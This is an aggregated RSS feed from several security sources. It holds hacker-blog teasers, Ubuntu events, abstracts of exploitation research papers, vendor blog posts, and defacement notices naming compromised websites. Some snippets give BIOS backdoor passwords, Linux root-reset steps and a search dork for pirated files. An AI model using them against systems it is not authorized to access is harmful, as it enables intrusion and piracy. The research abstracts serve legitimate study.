http://www.thehackerslibrary.com/?feed=rss BandWidth Explained Most hosting companies offer a variety of bandwidth options in their plans. So exactly what is bandwidth as it relates to web hosting? Put simply, bandwidth is the amount of traffic that is allowed to occur between your web site and the rest of the internet. The amount of bandwidth a hosting company [...]

==> GMAIL Search Query

http://www.thehackerslibrary.com/?feed=rss Gmail Search Syntax Gmail offers a rich search syntax for routing through your email message travel through the headers of your email message archive in search of mail sent by someone matching the keyword you provide: from:arbabusmani@gmail.com finds all messages sent to someone matching a provided keyword. (Don’t forget plus-addressing) to:usmani.arbab@yahoo.com to:hacking+books@gmail.com Match messages with [...]

==> Intrusion Detection Systems [IDS]

http://www.thehackerslibrary.com/?feed=rss An intrusion detection system (IDS) is software and/or hardware based system that monitors network traffic and monitors for suspicious activity and alerts the system or network administrator in case it detects some intrusion attempt from an external source into a private network. In some cases the IDS may also respond to anomalous or malicious traffic [...]

==> Google Hacking

http://www.thehackerslibrary.com/?feed=rss Use Google as a warez search engine a.k.a Get Free Stuff! 1.Go to www.google.com 2.In the Search Bar type in:“intitle:index of” and then type in the keyword for whatever you are looking for. So for example if I want to find some linkin park songs I would type in this: “intitle:index of” LINKINK PARK(OR SONG [...]

==> Gmail Themes are here!!!

http://www.thehackerslibrary.com/?feed=rss Hi All, The Themes for GMAIL are here. Though there is no official word from Google or Gmail team in the google blog yet, few people across the globe saw there gmail with themes and a new tab saying themes in the settings page. The settings page can be reached athttp://mail.google.com/mail/#settings/themes and for gohttp://mail.google.com/support/bin/answer.py?hl=en&ctx=mail&answer=112508 for [...]

==> Practical Hashing

http://www.thehackerslibrary.com/?feed=rss This is my first blog here and this will be about cryptographic hash functions. I have chosen this as the topic for my first post as hashing functions are very common in the field of cryptography, which is an area of interest of mine. A hash function takes a string of bits or bytes as [...]

==> Some linux commands

http://www.thehackerslibrary.com/?feed=rss Starting & Stopping shutdown -h now Shutdown the system now and do not reboot halt Stop all processes – same as above shutdown -r 5 Shutdown the system in 5 minutes and reboot shutdown -r now Shutdown the system now and reboot reboot Stop all processes and then reboot – same as above startx Start [...]

==> GUI Toolkits compared

http://www.thehackerslibrary.com/?feed=rss GUI Toolkits Compared I have worked with few UI libraries during my college days (late night hackwork !). Although It has months since i really coded something in C/C++ . Here is my opinion on most of the UI frameworks ( choices available ) . (a) Win32 API , GDI (user32.dll) This was the [...]

==> The New Era of Eavesdropping

http://www.thehackerslibrary.com/?feed=rss You all must have heard about Keyloggers. You can log the keystrokes using keyloggers working as a hidden background service at victim’s computer. Just imagine a case, you think your system is secured as its not having any keylogger and you’ve thoroughly scanned the background service and there is no suspicious service running behind as [...]

==> DNA Computing

http://www.thehackerslibrary.com/?feed=rss Silicon has been successful for years as computing materials. Almost every computer in the world has silicon in it. Probably we cant imagine a computer without silicon. So what is special in it? The answer lies in its structure what makes it a very special material for computer. But that is not our concern here. [...]

==> Port Scanning

http://www.thehackerslibrary.com/?feed=rss Port Scanning: Port scanning is the process of connecting to TCP and UDP ports on a target system to determined what services are running or in a LISTENING state. Identifying listening ports is critical to determine the type of operating system and applications in use. Active services that are listening may allow an unauthorized user [...]

==> BIOS Password Hack

http://www.thehackerslibrary.com/?feed=rss Standard BIOS backdoor passwords The first, less invasive, attempt to bypass a BIOS password is to try on of these standard manufacturer’s backdoor passwords: AWARD BIOS AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, [...]

==> Resetting Root Authorization in Linux and Prevention

http://www.thehackerslibrary.com/?feed=rss The root authentications can be reset to NULL value from the following method. Do not use this information for committing cyber crimes. AT Grub Loader. highlight the desired kernel which you want to boot ‘fedora core fc9′ press ‘e’ to edit the run levels and other options then the second menu arrives as .. (hd0,1) [...]

==> Firefox v/s Chrome

http://www.thehackerslibrary.com/?feed=rss * Post Updated, Must Read * Google Chromes release makes a big dust in the internet world. Mozilla is feeling big pressure about that. However, Mozilla has not hit the panic button yet, because they released a number of benchmarks showing Firefox 3.1 will be faster than anything Google can muster with Chrome. Google claims [...]

==> How to Bypass Mandatory Free Registrations

http://www.thehackerslibrary.com/?feed=rss Do you really get annoyed when asked for FREE REGISTRATIONS by many websites without which you cannot proceed further? Everyone who uses internet regularly must have faced this and must be knowing how annoying this is. Registering means, you have to give your personal details, which can result in SPAM, Promotion emails, Identity Theft etc. [...]

==> The Open Cloud Webinars: Stability, support and the latest cloud features: using the Ubuntu Cloud Archive

http://www.ubuntu.com/rss.xml The pace of innovation in the cloud is ferocious. And theres no better example than OpenStack - the fastest growing open source project ever, according to some reports. Join Ubuntu Server Engineering Manager Dave Walker, to learn how the Ubuntu Cloud Archive provides access to the very latest OpenStack features on long-term support releases of Ubuntu. The webinar will cover the principles behind the Ubuntu Cloud Archive and its use in the enterprise, enabling you and your organisation to make the most of the open cloud. Location: Online Time: Wed, 2012-11-07 16:00

==> The Open Cloud Webinars: Running OpenStack Folsom on Ubuntu 12.10 and Ubuntu 12.04 LTS

http://www.ubuntu.com/rss.xml The second webinar of our Ubuntu 12.10 series focuses on Folsom, the latest release of OpenStack. In this webinar, Ubuntu Server Engineering Manager Dave Walker will talk you through the process of deploying Folsom on Ubuntu 12.10 and 12.04 LTS, showcasing some of the unique deployment tools that make Ubuntu the fastest route to a fully-operative, enterprise-grade OpenStack cloud. Join us, learn more and ask questions live! Location: Online Time: Wed, 2012-10-31 17:00

==> The Open Cloud Webinars: New features in Ubuntu 12.10, the world’s most cloud-friendly OS

http://www.ubuntu.com/rss.xml Another 6 months has passed so it's time for next Ubuntu release! Join Mark Baker, Ubuntu Server Product Manager to find out about the new features in Ubuntu 12.10 and how you can take advantage of them. Whether you are new to Ubuntu or using it already this webinar will give you an insight into 12.10 for both server and cloud computing. Register today and ask questions live! Location: Online Time: Tue, 2012-10-23 16:00

==> Ubuntu Enterprise Summit

http://www.ubuntu.com/rss.xml The Ubuntu Enterprise Summit is a one-day conference aimed at technologists and IT decision-makers.At this years event, analysts and technologists will join key figures from Canonical, to discuss the new best practice and the road ahead for enterprise IT.For more information and to view the agenda, visit:http://uds.ubuntu.com/enterprise-summit/ Location: Copenhagen, Denmark Time: Tue, 2012-10-30 (All day)

==> Ubuntu Developer Summit

http://www.ubuntu.com/rss.xml Come and join us for yet another fantastic, action-packed Ubuntu Developer Summit!This time, we're in Europe at the Bella Centre in Copenhagen. Registration is free and spaces are limted so hurry!The Ubuntu Developer Summit is the event where we plan for the forthcoming version of Ubuntu. It brings together Canonical engineers, community members, partners, upstreamrepresentatives and cloud specialists, in an environment of active debate.For more information, visit:http://uds.ubuntu.com Location: Copenhagen, Denmark Time: Mon, 2012-10-29 (All day) - Thu, 2012-11-01 (All day)

==> DroidCon

http://www.ubuntu.com/rss.xml Canonical is a Partner Sponsor at the upcoming DroidCon event. Location: London, UK Time: Thu, 2012-10-25 (All day) - Fri, 2012-10-26 (All day)

==> Mass TLC: Cloud Summit

http://www.ubuntu.com/rss.xml Canonical will have a presence at Mass TLC's upcoming Cloud Summit.If you're in the area, stop by and say hello! Location: Boston, USA Time: Fri, 2012-10-19 (All day)

==> The OpenStack Summit

http://www.ubuntu.com/rss.xml Canonical is proud to be one of the premier sponsors of the OpenStack Summit.Ubuntu Founder, Mark Shuttleworth, will be presenting a keynote session and the Canonical team will be there, so stop by our booth and say hello!Canonical was the first company to commercially distribute and support OpenStack - and Ubuntu has remained the reference operating system for the OpenStack project since the beginning. We include it in every download and CD of Ubuntu Server, which gives us a huge interest in its continuing development.Canonical is also one of eight members of the OpenStack Foundation. Location: San Diego, USA Time: Mon, 2012-10-15 (All day) - Thu, 2012-10-18 (All day)

==> Zentyal Summit

http://www.ubuntu.com/rss.xml Canonical is proud to be a Premier Sponsor for the upcoming Zentyal Summit.Zentyal is an official Ubuntu Advantage Reseller.For more information, visit:http://events.zentyal.com/2012/10/04/zentyal-summit-2012-2/ Location: Zaragosa, Spain Time: Thu, 2012-10-04 (All day)

==> New Landscape Features and Functionality

http://www.ubuntu.com/rss.xml Landscape is the Ubuntu systems management tool, proven to save time and money when managing Ubuntu deployments at scale. Join this webinar to learn about new features including role-based access control, bare-metal provisioning and its full API, alongside reporting capabilities and other tools to give you total operational awareness. Youll gain a comprehensive insight into how Landscapes enterprise systems management and regulatory compliance functionality can help an organisation tame complexity. Location: Webinar Time: Thu, 2012-09-20 16:00

==> Using dual-mappings to evade automated unpackers

http://www.uninformed.org/uninformed.rss Automated unpackers such as Renovo, Saffron, and Pandora's Bochs attempt to dynamically unpack executables by detecting the execution of code from regions of virtual memory that have been written to. While this is an elegant method of detecting dynamic code execution, it is possible to evade these unpackers by dual-mapping physical pages to two distinct virtual address regions where one region is used as an editable mapping and the second region is used as an executable mapping. In this way, the editable mapping is written to during the unpacking process and the executable mapping is used to execute the unpacked code dynamically. This effectively evades automated unpackers which rely on detecting the execution of code from virtual addresses that have been written to.

==> Analyzing local privilege escalations in win32k

http://www.uninformed.org/uninformed.rss This paper analyzes three vulnerabilities that were found in win32k.sys that allow kernel-mode code execution. The win32k.sys driver is a major component of the GUI subsystem in the Windows operating system. These vulnerabilities have been reported by the author and patched in MS08-025. The first vulnerability is a kernel pool overflow with an old communication mechanism called the Dynamic Data Exchange (DDE) protocol. The second vulnerability involves improper use of the ProbeForWrite function within string management functions. The third vulnerability concerns how win32k handles system menu functions. Their discovery and exploitation are covered.

==> Exploiting Tomorrow's Internet Today: Penetration testing with IPv6

http://www.uninformed.org/uninformed.rss This paper illustrates how IPv6-enabled systems with link-local and auto-configured addresses can be compromised using existing security tools. While most of the techniques described can apply to "real" IPv6 networks, the focus of this paper is to target IPv6-enabled systems on the local network.

==> Can you find me now? Unlocking the Verizon Wireless xv6800 (HTC Titan) GPS

http://www.uninformed.org/uninformed.rss In August 2008 Verizon Wireless released a firmware upgrade for their xv6800 (rebranded HTC Titan) line of Windows Mobile smartphones that provided a number of new features previously unavailable on the device on the initial release firmware. In particular, support for accessing the device's built-in Qualcomm gpsOne assisted GPS chipset was introduced with this update. However, Verizon Wireless elected to attempt to lock down the GPS hardware on xv6800 such that only applications authorized by Verizon Wireless would be able to access the device's built-in GPS hardware and perform location-based functions (such as GPS-assisted navigation). The mechanism used to lock down the GPS hardware is entirely client-side based, however, and as such suffers from fundamental limitations in terms of how effective the lockdown can be in the face of an almost fully user-programmable Windows Mobile-based device. This article outlines the basic philosophy used to prevent unauthorized applications from accessing the GPS hardware and provides a discussion of several of the flaws inherent in the chosen design of the protection mechanism. In addition, several pitfalls relating to debugging and reverse engineering programs on Windows Mobile are also discussed. Finally, several suggested design alterations that would have mitigated some of the flaws in the current GPS lock down system from the perspective of safeguarding the privacy of user location data are also presented.

==> An Objective Analysis of the Lockdown Protection System for Battle.net

http://www.uninformed.org/uninformed.rss Near the end of 2006, Blizzard deployed the first major update to the version check and client software authentication system used to verify the authenticity of clients connecting to Battle.net using the binary game client protocol. This system had been in use since just after the release of the original Diablo game and the public launch of Battle.net. The new authentication module (Lockdown) introduced a variety of mechanisms designed to raise the bar with respect to spoofing a game client when logging on to Battle.net. In addition, the new authentication module also introduced run-time integrity checks of client binaries in memory. This is meant to provide simple detection of many client modifications (often labeled "hacks") that patch game code in-memory in order to modify game behavior. The Lockdown authentication module also introduced some anti-debugging techniques that are designed to make it more difficult to reverse engineer the module. In addition, several checks that are designed to make it difficult to simply load and run the Blizzard Lockdown module from the context of an unauthorized, non-Blizzard-game process. After all, if an attacker can simply load and run the Lockdown module in his or her own process, it becomes trivially easy to spoof the game client logon process, or to allow a modified game client to log on to Battle.net successfully. However, like any protection mechanism, the new Lockdown module is not without its flaws, some of which are discussed in detail in this paper.

==> ActiveX - Active Exploitation

http://www.uninformed.org/uninformed.rss This paper provides a general introduction to the topic of understanding software vulnerabilities that affect ActiveX controls. A brief description of how ActiveX controls are exposed to Internet Explorer is given along with an analysis of three example ActiveX vulnerabilities that have been previously disclosed.

==> Context-keyed Payload Encoding

http://www.uninformed.org/uninformed.rss A common goal of payload encoders is to evade a third-party detection mechanism which is actively observing attack traffic somewhere along the route from an attacker to their target, filtering on commonly used payload instructions. The use of a payload encoder may be easily detected and blocked as well as opening up the opportunity for the payload to be decoded for further analysis. Even so-called keyed encoders utilize easily observable, recoverable, or guessable key values in their encoding algorithm, thus making decoding on-the-fly trivial once the encoding algorithm is identified. It is feasible that an active observer may make use of the inherent functionality of the decoder stub to decode the payload of a suspected exploit in order to inspect the contents of that payload and make a control decision about the network traffic. This paper presents a new method of keying an encoder which is based entirely on contextual information that is predictable or known about the target by the attacker and constructible or recoverable by the decoder stub when executed at the target. An active observer of the attack traffic however should be unable to decode the payload due to lack of the contextual keying information.

==> Improving Software Security Analysis using Exploitation Properties

http://www.uninformed.org/uninformed.rss Reliable exploitation of security vulnerabilities has continued to become more difficult as formidable mitigations have been established and are now included by default with most modern operating systems. Future exploitation of software vulnerabilities will rely on either discovering ways to circumvent these mitigations or uncovering flaws that are not adequately protected. Since the majority of the mitigations that exist today lack universal bypass techniques, it has become more fruitful to take the latter approach. It is in this vein that this paper introduces the concept of exploitation properties and describes how they can be used to better understand the exploitability of a system irrespective of a particular vulnerability. Perceived exploitability is of utmost importance to both an attacker and to a defender given the presence of modern mitigations. The ANI vulnerability (MS07-017) is used to help illustrate these points by acting as a simple example of a vulnerability that may have been more easily identified as code that should have received additional scrutiny by taking exploitation properties into consideration.

==> Real-time Steganography with RTP

http://www.uninformed.org/uninformed.rss Real-time Transfer Protocol (RTP) is used by nearly all Voice-over-IP systems to provide the audio channel for calls. As such, it provides ample opportunity for the creation of a covert communication channel due to its very nature. While use of steganographic techniques with various audio cover-medium has been extensively researched, most applications of such have been limited to audio cover-medium of a static nature such as WAV or MP3 file audio data. This paper details a common technique for the use of steganography with audio data cover-medium, outlines the problem issues that arise when attempting to use such techniques to establish a full-duplex communications channel within audio data transmitted via an unreliable streaming protocol, and documents solutions to these problems. An implementation of the ideas discussed entitled SteganRTP is included in the reference materials.

==> OS X Kernel-mode Exploitation in a Weekend

http://www.uninformed.org/uninformed.rss Apple's Mac OS X operating system is attracting more attention from users and security researchers alike. Despite this increased interest, there is still an apparent lack of detailed vulnerability development information for OS X. This paper will attempt to help bridge this gap by walking through the entire vulnerability development process. This process starts with vulnerability discovery and ultimately finished with a remote code execution. To help illustrate this process, a real vulnerability found in the OS X wireless device driver is used.

==> A Catalog of Local Windows Kernel-mode Backdoor Techniques

http://www.uninformed.org/uninformed.rss This paper presents a detailed catalog of techniques that can be used to create local kernel-mode backdoors on Windows. These techniques include function trampolines, descriptor table hooks, model-specific register hooks, page table modifications, as well as others that have not previously been described. The majority of these techniques have been publicly known far in advance of this paper. However, at the time of this writing, there appears to be no detailed single point of reference for many of them. The intention of this paper is to provide a solid understanding on the subject of local kernel-mode backdoors. This understanding is necessary in order to encourage the thoughtful discussion of potential countermeasures and perceived advancements. In the vein of countermeasures, some additional thoughts are given to the common misconception that PatchGuard, in its current design, can be used to prevent kernel-mode rootkits.

==> Generalizing Data Flow Information

http://www.uninformed.org/uninformed.rss Generalizing information is a common method of reducing the quantity of data that must be considered during analysis. This fact has been plainly illustrated in relation to static data flow analysis where previous research has described algorithms that can be used to generalize data flow information. These generalizations have helped support more optimal data flow analysis in certain situations. In the same vein, this paper describes a process that can be employed to generalize and persist data flow information along multiple generalization tiers. Each generalization tier is meant to describe the data flow behaviors of a conceptual software element such as an instruction, a basic block, a procedure, a data type, and so on. This process makes use of algorithms described in previous literature to support the generalization of data flow information. To illustrate the usefulness of the generalization process, this paper also presents an algorithm that can be used to determine reachability at each generalization tier. The algorithm determines reachability starting from the least specific generalization tier and uses the set of reachable paths found to progressively qualify data flow information for each successive generalization tier. This helps to constrain the amount of data flow information that must be considered to a minimal subset.

==> Reducing the Effective Entropy of GS Cookies

http://www.uninformed.org/uninformed.rss This paper describes a technique that can be used to reduce the effective entropy in a given GS cookie by roughly 15 bits. This reduction is made possible because GS uses a number of weak entropy sources that can, with varying degrees of accuracy, be calculated by an attacker. It is important to note, however, that the ability to calculate the values of these sources for an arbitrary cookie currently relies on an attacker having local access to the machine, such as through the local console or through terminal services. This effectively limits the use of this technique to stack-based local privilege escalation vulnerabilities. In addition to the general entropy reduction technique, this paper discusses the amount of effective entropy that exists in services that automatically start during system boot. It is hypothesized that these services may have more predictable states of entropy due to the relative consistency of the boot process. While the techniques described in this paper do not illustrate a complete break of GS, any inherent weakness can have disastrous consequences given that GS is a static, compile-time security solution. It is not possible to simply distribute a patch. Instead, applications must be recompiled to take advantage of any security improvements. In that vein, the paper proposes some solutions that could be applied to address the problems that are outlined.

==> Memalyze: Dynamic Analysis of Memory Access Behavior in Software

http://www.uninformed.org/uninformed.rss This paper describes strategies for dynamically analyzing an application's memory access behavior. These strategies make it possible to detect when a read or write is about to occur at a given location in memory while an application is executing. An application's memory access behavior can provide additional insight into its behavior. For example, it may be able to provide an idea of how data propagates throughout the address space. Three individual strategies which can be used to intercept memory accesses are described in this paper. Each strategy makes use of a unique method of intercepting memory accesses. These methods include the use of Dynamic Binary Instrumentation (DBI), x86 hardware paging features, and x86 segmentation features. A detailed description of the design and implementation of these strategies for 32-bit versions of Windows is given. Potential uses for these analysis techniques are described in detail.

==> Mnemonic Password Formulas

http://www.uninformed.org/uninformed.rss The current information technology landscape is cluttered with a large number of information systems that each have their own individual authentication schemes. Even with single sign-on and multi-system authentication methods, systems within disparate management domains are likely to be utilized by users of various levels of involvement within the landscape as a whole. Due to this complexity and the abundance of authentication requirements, many users are required to manage numerous credentials across various systems. This has given rise to many different insecurities relating to the selection and management of passwords. This paper details a subset of issues facing users and managers of authentication systems involving passwords, discusses current approaches to mitigating those issues, and finally introduces a new method for password management and recalls termed Mnemonic Password Formulas.

==> Locreate: An Anagram for Relocate

http://www.uninformed.org/uninformed.rss This paper presents a proof of concept executable packer that does not use any custom code to unpack binaries at execution time. This is different from typical packers which generally rely on packed executables containing code that is used to perform the inverse of the packing operation at runtime. Instead of depending on custom code, the technique described in this paper uses documented behavior of the dynamic loader as a mechanism for performing the unpacking operation.

==> Exploiting 802.11 Wireless Driver Vulnerabilities on Windows

http://www.uninformed.org/uninformed.rss This paper describes the process of identifying and exploiting 802.11 wireless device driver vulnerabilities on Windows. This process is described in terms of two steps: pre-exploitation and exploitation.

==> Implementing a Custom X86 Encoder

http://www.uninformed.org/uninformed.rss This paper describes the process of implementing a custom encoder for the x86 architecture. To help set the stage, the McAfee Subscription Manager ActiveX control vulnerability, which was discovered by eEye, will be used as an example of a vulnerability that requires the implementation of a custom encoder.

==> Preventing the Exploitation of SEH Overwrites

http://www.uninformed.org/uninformed.rss This paper proposes a technique that can be used to prevent the exploitation of SEH overwrites on 32-bit Windows applications without requiring any recompilation.

==> Effective Bug Discovery

http://www.uninformed.org/uninformed.rss Sophisticated methods are currently being developed and implemented for mitigating the risk of exploitable bugs. The process of researching and discovering vulnerabilities in modern code will require changes to accommodate the shift in vulnerability mitigations

==> Wars Within

http://www.uninformed.org/uninformed.rss In this paper I will uncover the information exchange of what may be classified as one of the highest money making schemes coordinated by 'organized crime'. I will elaborate on information gathered from a third party individual directly involved in all aspects of the scheme at play.

==> Fingerprinting 802.11 Implementations via Statistical Analysis of the Duration Field

http://www.uninformed.org/uninformed.rss The research presented in this paper provides the reader with a set of algorithms and techniques that enable the user to remotely determine what chipset and device driver an 802.11 device is using.

==> Improving Automated Analysis of Windows x64 Binaries

http://www.uninformed.org/uninformed.rss As Windows x64 becomes a more prominent platform, it will become necessary to develop techniques that improve the binary analysis process. In particular, automated techniques that can ...

==> Exploiting the Otherwise Non-Exploitable on Windows

http://www.uninformed.org/uninformed.rss This paper describes a technique that can be applied in certain situations to gain arbitrary code execution through software bugs that would not otherwise be exploitable, such ...

==> Abusing Mach on Mac OS X

http://www.uninformed.org/uninformed.rss This paper discusses the security implications of Mach being integrated with the Mac OS X kernel. A few examples are used to illustrate how Mach support can be used to bypass some of the BSD security features, ...

==> GREPEXEC: Grepping Executive Objects from Pool Memory

http://www.uninformed.org/uninformed.rss As rootkits continue to evolve and become more advanced, methods that can be used to detect hidden objects must also evolve. For example, relying on system provided APIs to ...

==> Anti-Virus Software Gone Wrong

http://www.uninformed.org/uninformed.rss Anti-virus software is becoming more and more prevalent on end-user computers today. Many major computer vendors (such as Dell) bundle anti-virus software and other personal security suites in the default ...

==> Bypassing PatchGuard on Windows x64

http://www.uninformed.org/uninformed.rss The version of the Windows kernel that runs on the x64 platform has introduced a new feature, nicknamed PatchGuard, that is intended to prevent both malicious software and third-party vendors ...

==> Windows Kernel-mode Payload Fundamentals

http://www.uninformed.org/uninformed.rss This paper discusses the theoretical and practical implementations of kernel-mode payloads on Windows. At the time of this writing, kernel-mode research is generally regarded as the ...

==> Analyzing Common Binary Parser Mistakes

http://www.uninformed.org/uninformed.rss With just about one file format bug being consistently released on a weekly basis over the past six to twelve months, one can only hope developers would look and learn. The reality of it ...

==> Attacking NTLM with Precomputed Hashtables

http://www.uninformed.org/uninformed.rss Breaking encrypted passwords has been of interest to hackers for a long time, and protecting them has always been one of the biggest security problems operating systems have faced, with ...

==> Linux Improvised Userland Schedular Virus

http://www.uninformed.org/uninformed.rss This paper discusses the combination of a userland scheduler and runtime process infection for a virus. These two concepts complete each other. The runtime process infection opens the door to ...

==> FUTo

http://www.uninformed.org/uninformed.rss Since the introduction of FU, the rootkit world has moved away from implementing system hooks to hide their presence. Because of this change in offense, a new defense had to be developed. The new algorithms ...

==> Thick Clients Gone Wrong

http://www.uninformed.org/uninformed.rss When designing thick-client based solutions,developers often suffer from the incorrect assumption that end-users are incapable of modifying, examining, or emulating the packaged client. Throughout this document, ...

==> Inside Blizzard: Battle.net

http://www.uninformed.org/uninformed.rss This paper intends to describe a variety of the problems Blizzard Entertainment has encountered from a practical standpoint through their implementation of the large-scale online game matchmaking and chat ...

==> Temporal Return Addresses

http://www.uninformed.org/uninformed.rss Nearly all existing exploitation vectors depend on some knowledge of a process' address space prior to an attack in order to gain meaningful control of execution flow. In cases where this is necessary, exploit ...

==> Bypassing Windows Hardware-enforced DEP

http://www.uninformed.org/uninformed.rss This paper describes a technique that can be used to bypass Windows hardware-enforced Data Execution Prevention (DEP) on default installations of Windows XP Service Pack 2 and Windows 2003 Server Service Pack 1. This technique makes it possible to execute ...

==> 802.11 VLANs and Association Redirection

http://www.uninformed.org/uninformed.rss The goal of this paper is to introduce the reader to a technique that could be used to implement something analogous to VLANs found in wired media into a typical IEEE 802.11 environment. ...

==> Introduction to Reverse Engineering Win32 Applications

http://www.uninformed.org/uninformed.rss During the course of this paper the reader will be (re)introduced to many concepts and tools essential to understanding and controlling native Win32 applications through the eyes of ...

==> Post-Exploitation on Windows using ActiveX Controls

http://www.uninformed.org/uninformed.rss When exploiting software vulnerabilities it is sometimes impossible to build direct communication channels between a target machine and an attacker's machine due to restrictive outbound ...

==> Smart Parking Meters

http://www.uninformed.org/uninformed.rss Security through obscurity is unfortunately much more common than people think: many interfaces are built on the premise that since they are a "closed system" they can ignore standard security practices. This paper ...

==> Loop Detection

http://www.uninformed.org/uninformed.rss During the course of this paper the reader will gain new knowledge about previous and new research on the subject of loop detection. The topic of loop detection will be applied to the field of binary analysis and ...

==> Social Zombies: Aspects of Trojan Networks

http://www.uninformed.org/uninformed.rss Malicious code is so common in today's Internet that it seems impossible for an average user to keep his or her system clean. It's estimated that several hundred thousand machines are infected by trojans to be abused in a variety of ways, including the theft ...

==> Mac OS X PPC Shellcode Tricks

http://www.uninformed.org/uninformed.rss Developing shellcode for Mac OS X is not particularly difficult, but there are a number of tips and techniques that can make the process easier and more effective. The independent data and instruction ...

==> Annoyances Caused by Unsafe Assumptions

http://www.uninformed.org/uninformed.rss This installation of What Were They Thinking illustrates some of the annoyances that can be caused when developing software that has to inter-operate with third-party applications. Two such cases ...

==> Final Two Winners of Our #NoSOUP Photo Contest

http://www.veracode.com/blog/?feed=rss2 mat-spitzWith RSA all rounded up the only thing left for us is to announce the final two winners of our #NoSOUP photo contest and get their prizes out to them. Our photo booth with Larry Thomas of Seinfeld was a great success with over 1,000 photos taken with him over the course of the week! Nearly 100 of you decided to participate in our #NoSOUP contest through either Twitter, Facebook or emailing us your photos (you can see the full list of email entries on our official #NoSOUP contest page.)

==> At The Vulnerability Oscars, The Winner Is….Buffer Overflow!!

http://www.veracode.com/blog/?feed=rss2 The Vulnerability OscarsAnalysis of 25 years of CVSS vulnerability data from the firm Sourcefire finds that buffer overflows are the most common - and the most commonly meddlesome - problem in the software world. Why?

==> The First Two Winners in Our #NoSOUP Photo Contest

http://www.veracode.com/blog/?feed=rss2 chris-wysopal-soup-naziAs you may have noticed our team has been out in San Francisco this week enjoying and working the RSA Conference. Larry Thomas from Seinfeld, "the S.O.U.P. Nazi" has made a big splash and folks have been lining up by the hundreds to get their photos taken with him. We thought this might be the case which is why we built our contest around Larry and made it as simple as sharing your photo with him.

==> #NoSoup For You Photo Contest

http://www.veracode.com/blog/?feed=rss2 soup-nazi-photo-contestYou've probably already heard that our RSA Booth #1342 will be featuring a photo op with Larry Thomas from Seinfeld. Fans of the show will undoubtedly remember his immensely popular character the Soup Nazi as he was one of the few, perhaps only guest character that stole the show from it's mainstays. But why did we commission him to join us? Simple. We're out to eliminate S.O.U.P., no not the chicken noodle sort but rather Software of Unknown Pedigree!

==> Veracode at RSA Conference USA 2013

http://www.veracode.com/blog/?feed=rss2 No S.O.U.P. at the Veracode RSA BoothWith RSA Conference kicking off Monday the offices here are abuzz with activity. In addition to our Booth (#1342) we will also have a few other notable attractions for attendees. Between Conference Sessions, our 'Wicked Smaaht' Security Talks, a photo booth featuring Larry Thomas from Seinfeld and an iOS app available for download there's something for everyone this year!

==> Cybercriminal Eye On The Developer Guy: Hacking Facebook, Twitter and Apple

http://www.veracode.com/blog/?feed=rss2 A Developer Holds Many KeysThere are lots of interesting conclusions to be drawn from the recent targeted hacks of Facebook, Twitter and Apple. Chief among them: application developers are on the list of targets for sophisticated cyber criminal groups.

==> A Look Back on the Future of Tomorrow

http://www.veracode.com/blog/?feed=rss2 1x1x1=4Like many of my industry peers, my first job was in the telecom industry developing software. Back in the day, we used telnet to remotely login to the work station of our choice and then go on about our day writing code and sipping coffee. Software security was not part of our vocabulary or our corporate culture.

==> Zombie Apocalypse? Blame The User!

http://www.veracode.com/blog/?feed=rss2 Zombies! Just kidding.No, the dead arent rising from their graves to attack the living. But that doesnt mean that theres not plenty of blame to go around in the recent hack of the U.S.s Emergency Alerting Service (EAS).

==> How We Made Social Sharing “Smarter”

http://www.veracode.com/blog/?feed=rss2 For the curious developers or security folk following us we wanted to share the methodology behind our latest tool, Smart Social Sharing. The State of Social Sharing Commercial sharing tools provide simple and fast social sharing of web content. Tools like AddThis, ShareThis, and other CMS plugins that enable social sharing, are ubiquitous.

==> Why We Made SmartShare: A Safer Social Sharing Plugin

http://www.veracode.com/blog/?feed=rss2 Why We Built ItVeracode's mission is to secure the software that runs the world. Our marketing department is no exception. When we recently looked at the security posture of the veracode.com website we found we were using too many untrusted third party widgets that put site visitors at risk and could even be potentially used to deface our website. Instead of removing this functionality from the website or staying with the risky status quo, we took it upon ourselves to build a safer alternative.

==> http://andyspointofview.com

http://www.zone-h.org/rss/defacements http://andyspointofview.com notified by VirusDuba

==> http://amichepercaso.it

http://www.zone-h.org/rss/defacements http://amichepercaso.it notified by VirusDuba

==> http://www.archifarm.it

http://www.zone-h.org/rss/defacements http://www.archifarm.it notified by VirusDuba

==> http://www.animareonlus.it

http://www.zone-h.org/rss/defacements http://www.animareonlus.it notified by VirusDuba

==> http://www.animatamente.org

http://www.zone-h.org/rss/defacements http://www.animatamente.org notified by VirusDuba

==> http://adabenevento.org

http://www.zone-h.org/rss/defacements http://adabenevento.org notified by VirusDuba

==> http://051studio.it

http://www.zone-h.org/rss/defacements http://051studio.it notified by VirusDuba

==> http://wpspace.eu

http://www.zone-h.org/rss/defacements http://wpspace.eu notified by VirusDuba

==> http://spotlife.com.br/ck.htm

http://www.zone-h.org/rss/defacements http://spotlife.com.br/ck.htm notified by HighTech

==> http://www.hblaw.com.au

http://www.zone-h.org/rss/defacements http://www.hblaw.com.au notified by Danger Security Team

==> http://www.mjsbernal.org.ar

http://www.zone-h.org/rss/defacements http://www.mjsbernal.org.ar notified by THE-AjaN

==> http://onlyneeducationservices.com

http://www.zone-h.org/rss/defacements http://onlyneeducationservices.com notified by Pakhtun72

==> http://v3dev.eu

http://www.zone-h.org/rss/defacements http://v3dev.eu notified by Pakhtun72

==> http://www.secure-doc.org

http://www.zone-h.org/rss/defacements http://www.secure-doc.org notified by Pakhtun72

==> http://www.sanskruthiglobalschool.in

http://www.zone-h.org/rss/defacements http://www.sanskruthiglobalschool.in notified by PMH

==> http://balirentalevent.com

http://www.zone-h.org/rss/defacements http://balirentalevent.com notified by Index Php

==> http://www.petetokar.com

http://www.zone-h.org/rss/defacements http://www.petetokar.com notified by Pakhtun72

==> http://thegreatcrossalliance.com

http://www.zone-h.org/rss/defacements http://thegreatcrossalliance.com notified by Pakhtun72

==> http://fathead-web.com

http://www.zone-h.org/rss/defacements http://fathead-web.com notified by Pakhtun72

==> http://faith-manages.org

http://www.zone-h.org/rss/defacements http://faith-manages.org notified by Pakhtun72

==> Hacker diagnosed with brain cancer, hacks the closed source report distributing it to the open source community hoping to get some help

